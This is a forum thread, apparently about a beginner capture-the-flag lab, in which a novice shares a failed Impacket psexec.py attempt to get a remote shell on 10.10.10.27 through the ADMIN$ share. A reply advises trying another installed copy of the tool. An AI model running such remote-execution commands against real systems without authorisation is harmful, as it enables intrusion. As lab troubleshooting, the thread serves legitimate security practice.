[Noob] Help with the starting point

Hello world

I’m blocked on the last action, the upload does’nt work probelly :frowning:

How can i solve this ?

====================================================

kali@kali:~/impacket/examples$ ./psexec.py administrator@10.10.10.27
Impacket v0.9.22.dev1+20200513.101403.9a4b3f52 - Copyright 2020 SecureAuth Corporation

Password:
[] Requesting shares on 10.10.10.27…
[
] Found writable share ADMIN$
[*] Uploading file UgmBhFGY.exe
[-] Error uploading file UgmBhFGY.exe, aborting…
[-] Error performing the installation, cleaning up: [Errno 32] Broken pipe

=======================================================

Best regards

I also got stuck on the last step when I did this box. I ended up using this version of psexec.py instead:

python3 /usr/share/doc/python3-impacket/examples/psexec.py administrator@10.10.10.27

If you’re wondering how I found it, on Kali type:

locate psexec.py

And then apart from your ~/impacket/examples you will get all other versions of psexec showing. I just tried them all until one worked.